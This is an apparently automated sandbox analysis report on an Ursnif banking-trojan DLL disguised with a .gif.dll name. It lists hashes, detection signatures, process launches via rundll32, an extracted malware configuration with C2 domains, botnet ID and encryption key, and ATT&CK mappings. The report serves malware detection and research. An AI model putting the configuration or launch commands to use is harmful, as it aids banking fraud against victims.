Loading ...

Play interactive tourEdit tour

Analysis Report gg.gif.dll

Overview

General Information

Sample Name:gg.gif.dll
Analysis ID:382563
MD5:716649589f77b4c078b4fd89cfab2420
SHA1:841dde1545bdfee1be219de7d905d3d2db8ca5bb
SHA256:9f644696f60e80e65ba49dad63c828ba7eca8a3dd6a214bc5321cb7d3ed2c8e6
Tags:dllGGGoziIFSBUrsnif
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Ursnif
Machine Learning detection for sample
Antivirus or Machine Learning detection for unpacked file
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
PE file contains sections with non-standard names
Program does not show much activity (idle)
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 6408 cmdline: loaddll32.exe 'C:\Users\user\Desktop\gg.gif.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 6420 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\gg.gif.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6440 cmdline: rundll32.exe 'C:\Users\user\Desktop\gg.gif.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6428 cmdline: rundll32.exe C:\Users\user\Desktop\gg.gif.dll,DllServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

Threatname: Ursnif

[[{"RSA Public Key": "bUd4GFcFHo0e+ZYUbkHaTKXmZ1xEyxvy7Ha6j1WAZbQ7YvMdkqTfD1vHD2y2CmFTRrLK1w5iQroYI0mUpJ4xNknlY+BmJf4xpeJRxxK0RRNeRbW5unSB2vXqxvlTgz6vNZY+9zeztuP2jXKpIm0/s+YxWnsT7eWUtQtD38NlsAPtJdp+3rBxjzAWNKQj7wMA"}, {"c2_domain": ["bing.com", "update4.microsoft.com", "under17.com", "urs-world.com"], "botnet": "5566", "server": "12", "serpent_key": "10301029JSJUYDWG", "sleep_time": "10", "SetWaitableTimer_value": "0", "DGA_count": "10"}]]

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.605125976.00000000034F0000.00000004.00000001.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
    00000003.00000002.299614666.00000000046D0000.00000004.00000001.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
      00000002.00000002.252036130.00000000032C0000.00000004.00000001.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.rundll32.exe.32c0000.2.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
          0.2.loaddll32.exe.34f0000.2.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
            0.2.loaddll32.exe.10000000.3.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              3.2.rundll32.exe.46d0000.2.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security

                Sigma Overview

                No Sigma rule has matched

                Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Found malware configurationShow sources
                Source: 2.2.rundll32.exe.32c0000.2.raw.unpackMalware Configuration Extractor: Ursnif [[{"RSA Public Key": "bUd4GFcFHo0e+ZYUbkHaTKXmZ1xEyxvy7Ha6j1WAZbQ7YvMdkqTfD1vHD2y2CmFTRrLK1w5iQroYI0mUpJ4xNknlY+BmJf4xpeJRxxK0RRNeRbW5unSB2vXqxvlTgz6vNZY+9zeztuP2jXKpIm0/s+YxWnsT7eWUtQtD38NlsAPtJdp+3rBxjzAWNKQj7wMA"}, {"c2_domain": ["bing.com", "update4.microsoft.com", "under17.com", "urs-world.com"], "botnet": "5566", "server": "12", "serpent_key": "10301029JSJUYDWG", "sleep_time": "10", "SetWaitableTimer_value": "0", "DGA_count": "10"}]]
                Multi AV Scanner detection for submitted fileShow sources
                Source: gg.gif.dllReversingLabs: Detection: 41%
                Machine Learning detection for sampleShow sources
                Source: gg.gif.dllJoe Sandbox ML: detected
                Source: 0.2.loaddll32.exe.10000000.3.unpackAvira: Label: TR/Crypt.XPACK.Gen8
                Source: gg.gif.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

                Key, Mouse, Clipboard, Microphone and Screen Capturing:

                barindex
                Yara detected UrsnifShow sources
                Source: Yara matchFile source: 00000000.00000002.605125976.00000000034F0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.299614666.00000000046D0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.252036130.00000000032C0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 2.2.rundll32.exe.32c0000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.loaddll32.exe.34f0000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.loaddll32.exe.10000000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.rundll32.exe.46d0000.2.raw.unpack, type: UNPACKEDPE

                E-Banking Fraud:

                barindex
                Yara detected UrsnifShow sources
                Source: Yara matchFile source: 00000000.00000002.605125976.00000000034F0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.299614666.00000000046D0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.252036130.00000000032C0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 2.2.rundll32.exe.32c0000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.loaddll32.exe.34f0000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.loaddll32.exe.10000000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.rundll32.exe.46d0000.2.raw.unpack, type: UNPACKEDPE
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10002375 NtQueryVirtualMemory,0_2_10002375
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_03055F160_2_03055F16
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0305150C0_2_0305150C
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_03053A140_2_03053A14
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_03051B1E0_2_03051B1E
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_03055A250_2_03055A25
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_030519670_2_03051967
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_030525660_2_03052566
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_030552620_2_03055262
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_03052A690_2_03052A69
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_030553780_2_03055378
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_03052FAF0_2_03052FAF
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_03053FAB0_2_03053FAB
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_030531B30_2_030531B3
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_030592B20_2_030592B2
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_030588BA0_2_030588BA
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_030513C50_2_030513C5
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_030527D40_2_030527D4
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_03051CD00_2_03051CD0
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_030543D80_2_030543D8
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100021540_2_10002154
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_032A5F162_2_032A5F16
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_032A5A252_2_032A5A25
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_032A150C2_2_032A150C
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_032A1B1E2_2_032A1B1E
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_032A3A142_2_032A3A14
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_032A2A692_2_032A2A69
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_032A52622_2_032A5262
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_032A25662_2_032A2566
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_032A19672_2_032A1967
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_032A53782_2_032A5378
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_032A3FAB2_2_032A3FAB
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_032A2FAF2_2_032A2FAF
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_032A88BA2_2_032A88BA
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_032A92B22_2_032A92B2
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_032A31B32_2_032A31B3
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_032A13C52_2_032A13C5
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_032A43D82_2_032A43D8
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_032A1CD02_2_032A1CD0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_032A27D42_2_032A27D4
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_046B5F163_2_046B5F16
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_046B2A693_2_046B2A69
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_046B52623_2_046B5262
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_046B19673_2_046B1967
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_046B25663_2_046B2566
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_046B53783_2_046B5378
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_046B5A253_2_046B5A25
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_046B150C3_2_046B150C
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_046B1B1E3_2_046B1B1E
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_046B3A143_2_046B3A14
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_046B13C53_2_046B13C5
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_046B43D83_2_046B43D8
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_046B1CD03_2_046B1CD0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_046B27D43_2_046B27D4
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_046B3FAB3_2_046B3FAB
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_046B2FAF3_2_046B2FAF
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_046B88BA3_2_046B88BA
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_046B31B33_2_046B31B3
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_046B92B23_2_046B92B2
                Source: gg.gif.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                Source: classification engineClassification label: mal68.troj.winDLL@7/0@0/0
                Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\gg.gif.dll,DllServer
                Source: gg.gif.dllReversingLabs: Detection: 41%
                Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\gg.gif.dll'
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\gg.gif.dll',#1
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\gg.gif.dll,DllServer
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\gg.gif.dll',#1
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\gg.gif.dll',#1Jump to behavior
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\gg.gif.dll,DllServerJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\gg.gif.dll',#1Jump to behavior
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10001745 LoadLibraryA,GetProcAddress,0_2_10001745
                Source: gg.gif.dllStatic PE information: section name: .code
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_03055F16 push dword ptr [ebp-0Ch]; mov dword ptr [esp], edx0_2_03055F7B
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_03055F16 push dword ptr [ebp-0Ch]; mov dword ptr [esp], eax0_2_03055F94
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_03055F16 push dword ptr [ebp-08h]; mov dword ptr [esp], eax0_2_03055FDD
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_03055F16 push dword ptr [ebp-10h]; mov dword ptr [esp], eax0_2_0305604B
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_03055F16 push dword ptr [ebp-08h]; mov dword ptr [esp], eax0_2_03056124
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_03055F16 push 00000000h; mov dword ptr [esp], edi0_2_0305614F
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_03055F16 push 00000000h; mov dword ptr [esp], edx0_2_0305625E
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_03055F16 push dword ptr [ebp-10h]; mov dword ptr [esp], eax0_2_030562B5
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_03055F16 push dword ptr [ebp-10h]; mov dword ptr [esp], eax0_2_03056343
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_03055F16 push dword ptr [ebp-10h]; mov dword ptr [esp], eax0_2_0305635D
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_03055F16 push 00000000h; mov dword ptr [esp], ebp0_2_03056368
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_03055F16 push dword ptr [ebp-0Ch]; mov dword ptr [esp], eax0_2_03056385
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_03055F16 push 00000000h; mov dword ptr [esp], edx0_2_030563B4
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_03055F16 push dword ptr [ebp-08h]; mov dword ptr [esp], eax0_2_03056483
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_03055F16 push dword ptr [ebp-08h]; mov dword ptr [esp], eax0_2_030564F2
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_03055F16 push dword ptr [ebp-10h]; mov dword ptr [esp], eax0_2_030564FE
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_03055F16 push dword ptr [ebp-08h]; mov dword ptr [esp], eax0_2_0305650A
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_03055F16 push 00000000h; mov dword ptr [esp], edi0_2_03056567
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_03055F16 push 00000000h; mov dword ptr [esp], edi0_2_030565A9
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_03055F16 push 00000000h; mov dword ptr [esp], eax0_2_03056610
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_03055F16 push dword ptr [ebp-0Ch]; mov dword ptr [esp], eax0_2_03056685
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_03055F16 push dword ptr [ebp-08h]; mov dword ptr [esp], ecx0_2_030566C2
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_03055F16 push dword ptr [ebp-0Ch]; mov dword ptr [esp], eax0_2_030566E8
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_03055F16 push 00000000h; mov dword ptr [esp], edi0_2_03056781
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_03055F16 push 00000000h; mov dword ptr [esp], edx0_2_030567B6
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_03055F16 push dword ptr [ebp-0Ch]; mov dword ptr [esp], eax0_2_0305684C
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_03055F16 push dword ptr [ebp-0Ch]; mov dword ptr [esp], eax0_2_03056858
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_03055F16 push dword ptr [ebp-10h]; mov dword ptr [esp], edx0_2_03056926
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_03055F16 push dword ptr [ebp-08h]; mov dword ptr [esp], eax0_2_03056945
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_03055F16 push dword ptr [ebp-0Ch]; mov dword ptr [esp], eax0_2_03056951
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_03055F16 push dword ptr [ebp-0Ch]; mov dword ptr [esp], edx0_2_030569D6

                Hooking and other Techniques for Hiding and Protection:

                barindex
                Yara detected UrsnifShow sources
                Source: Yara matchFile source: 00000000.00000002.605125976.00000000034F0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.299614666.00000000046D0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.252036130.00000000032C0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 2.2.rundll32.exe.32c0000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.loaddll32.exe.34f0000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.loaddll32.exe.10000000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.rundll32.exe.46d0000.2.raw.unpack, type: UNPACKEDPE
                Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Windows\System32\loaddll32.exeLast function: Thread delayed
                Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 120000Jump to behavior
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10001745 LoadLibraryA,GetProcAddress,0_2_10001745
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_03052A69 xor edi, dword ptr fs:[00000030h]0_2_03052A69
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_032A2A69 xor edi, dword ptr fs:[00000030h]2_2_032A2A69
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_046B2A69 xor edi, dword ptr fs:[00000030h]3_2_046B2A69
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\gg.gif.dll',#1Jump to behavior
                Source: loaddll32.exe, 00000000.00000002.602492347.0000000001C00000.00000002.00000001.sdmpBinary or memory string: Program Manager
                Source: loaddll32.exe, 00000000.00000002.602492347.0000000001C00000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                Source: loaddll32.exe, 00000000.00000002.602492347.0000000001C00000.00000002.00000001.sdmpBinary or memory string: Progman
                Source: loaddll32.exe, 00000000.00000002.602492347.0000000001C00000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1000163F SetThreadPriority,GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,0_2_1000163F
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10001850 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,0_2_10001850

                Stealing of Sensitive Information:

                barindex
                Yara detected UrsnifShow sources
                Source: Yara matchFile source: 00000000.00000002.605125976.00000000034F0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.299614666.00000000046D0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.252036130.00000000032C0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 2.2.rundll32.exe.32c0000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.loaddll32.exe.34f0000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.loaddll32.exe.10000000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.rundll32.exe.46d0000.2.raw.unpack, type: UNPACKEDPE

                Remote Access Functionality:

                barindex
                Yara detected UrsnifShow sources
                Source: Yara matchFile source: 00000000.00000002.605125976.00000000034F0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.299614666.00000000046D0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.252036130.00000000032C0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 2.2.rundll32.exe.32c0000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.loaddll32.exe.34f0000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.loaddll32.exe.10000000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.rundll32.exe.46d0000.2.raw.unpack, type: UNPACKEDPE

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsNative API1Path InterceptionProcess Injection12Rundll321OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion1LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Software Packing1Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection12NTDSSystem Information Discovery3Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 382563 Sample: gg.gif.dll Startdate: 06/04/2021 Architecture: WINDOWS Score: 68 15 Found malware configuration 2->15 17 Multi AV Scanner detection for submitted file 2->17 19 Yara detected  Ursnif 2->19 21 Machine Learning detection for sample 2->21 7 loaddll32.exe 1 2->7         started        process3 process4 9 cmd.exe 1 7->9         started        11 rundll32.exe 7->11         started        process5 13 rundll32.exe 9->13         started       

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                gg.gif.dll42%ReversingLabsWin32.Trojan.Wacatac
                gg.gif.dll100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                0.2.loaddll32.exe.10000000.3.unpack100%AviraTR/Crypt.XPACK.Gen8Download File

                Domains

                No Antivirus matches

                URLs

                No Antivirus matches

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted IPs

                No contacted IP infos

                General Information

                Joe Sandbox Version:31.0.0 Emerald
                Analysis ID:382563
                Start date:06.04.2021
                Start time:10:04:39
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 8m 8s
                Hypervisor based Inspection enabled:false
                Report type:full
                Sample file name:gg.gif.dll
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Run name:Run with higher sleep bypass
                Number of analysed new started processes analysed:36
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal68.troj.winDLL@7/0@0/0
                EGA Information:Failed
                HDC Information:
                • Successful, ratio: 56.4% (good quality ratio 50.2%)
                • Quality average: 67.1%
                • Quality standard deviation: 32.6%
                HCA Information:
                • Successful, ratio: 56%
                • Number of executed functions: 14
                • Number of non-executed functions: 24
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Sleeps bigger than 120000ms are automatically reduced to 1000ms
                • Found application associated with file extension: .dll
                Warnings:
                Show All
                • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe

                Simulations

                Behavior and APIs

                TimeTypeDescription
                10:06:12API Interceptor1x Sleep call for process: rundll32.exe modified
                10:07:21API Interceptor1x Sleep call for process: loaddll32.exe modified

                Joe Sandbox View / Context

                IPs

                No context

                Domains

                No context

                ASN

                No context

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                No created / dropped files found

                Static File Info

                General

                File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                Entropy (8bit):6.128077191391246
                TrID:
                • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                • Generic Win/DOS Executable (2004/3) 0.20%
                • DOS Executable Generic (2002/1) 0.20%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:gg.gif.dll
                File size:118156
                MD5:716649589f77b4c078b4fd89cfab2420
                SHA1:841dde1545bdfee1be219de7d905d3d2db8ca5bb
                SHA256:9f644696f60e80e65ba49dad63c828ba7eca8a3dd6a214bc5321cb7d3ed2c8e6
                SHA512:dca238736a5a12e0ce89b1f257ab8cffeec5ab3133d5370c9482d56160e89caaa072da463cf19f99b7dd9d90aea5949911c29fcedfa28e7d1914b9127f11e7f8
                SSDEEP:1536:tm15JsYYm3GCVS7ZicTJzRVd620ZmB9RMli0msUdqZEACW4jySTLW:eLsacThRVd6pmBPM07vYZEA4/W
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._W...6e..6e..6e..)v..6e...w..6e.Rich.6e.................PE..L.....f`...........!................ko.............................

                File Icon

                Icon Hash:74f0e4ecccdce0e4

                Static PE Info

                General

                Entrypoint:0x10006f6b
                Entrypoint Section:.code
                Digitally signed:false
                Imagebase:0x10000000
                Subsystem:windows gui
                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
